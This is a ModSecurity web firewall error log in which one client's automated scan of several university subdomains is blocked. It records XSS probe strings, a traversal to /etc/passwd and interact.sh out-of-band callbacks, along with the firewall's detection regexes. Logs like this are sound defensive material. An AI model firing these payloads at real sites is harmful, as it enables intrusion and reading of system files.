[Tue Aug 29 11:52:49.672602 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15ocCo-f0AAAfWOSQAAAAL"]
[Tue Aug 29 11:52:50.564733 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAmQ-3sAAAAb"]
[Tue Aug 29 11:52:50.568806 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:u. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:u: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tweb/ft.php"] [unique_id "ZO15osCo-f0AAAoLfLoAAAAG"]
[Tue Aug 29 11:52:50.604039 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15osCo-f0AAAoPuZ4AAAAM"]
[Tue Aug 29 11:52:50.676290 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15osCo-f0AAAoQ3NwAAAAN"]
[Tue Aug 29 11:52:50.702800 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/anti-plagiarism/js.php"] [unique_id "ZO15osCo-f0AAAmQ-30AAAAb"]
[Tue Aug 29 11:52:50.723448 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAoGFb8AAAAE"]
[Tue Aug 29 11:52:50.729720 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15osCo-f0AAAnTlV8AAAAA"]
[Tue Aug 29 11:52:51.381096 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAnHQpQAAAAT"]
[Tue Aug 29 11:52:51.832214 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAnHQpUAAAAT"]
[Tue Aug 29 11:52:51.833360 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15o8Co-f0AAAoVqqEAAAAH"]
[Tue Aug 29 11:52:51.845545 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAoT7RYAAAAD"]
[Tue Aug 29 11:52:51.922126 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15o8Co-f0AAAnHQpgAAAAT"]
[Tue Aug 29 11:52:52.076847 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAnd3NwAAAAI"]
[Tue Aug 29 11:52:52.239082 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAoW7J4AAAAJ"]
[Tue Aug 29 11:52:52.248017 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15pMCo-f0AAAnTlWkAAAAA"]
[Tue Aug 29 11:52:52.290562 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15pMCo-f0AAAnTlWsAAAAA"]
[Tue Aug 29 11:52:52.548416 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoW7KMAAAAJ"]
[Tue Aug 29 11:52:52.621305 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoW7KQAAAAJ"]
[Tue Aug 29 11:52:52.627223 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnTlW4AAAAA"]
[Tue Aug 29 11:52:52.628835 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAoVqqYAAAAH"]
[Tue Aug 29 11:52:52.644358 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoW7KUAAAAJ"]
[Tue Aug 29 11:52:52.644845 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnd3OMAAAAI"]
[Tue Aug 29 11:52:52.676042 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1'<script found within ARGS:id: 1'<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15pMCo-f0AAAoLfM0AAAAG"]
[Tue Aug 29 11:52:52.705631 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pMCo-f0AAAnd3OUAAAAI"]
[Tue Aug 29 11:52:52.771173 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoXJr0AAAAP"]
[Tue Aug 29 11:52:52.776509 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnd3OYAAAAI"]
[Tue Aug 29 11:52:52.847644 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAnd3OgAAAAI"]
[Tue Aug 29 11:52:52.849516 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoLfNAAAAAG"]
[Tue Aug 29 11:52:52.867827 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAnHQqQAAAAT"]
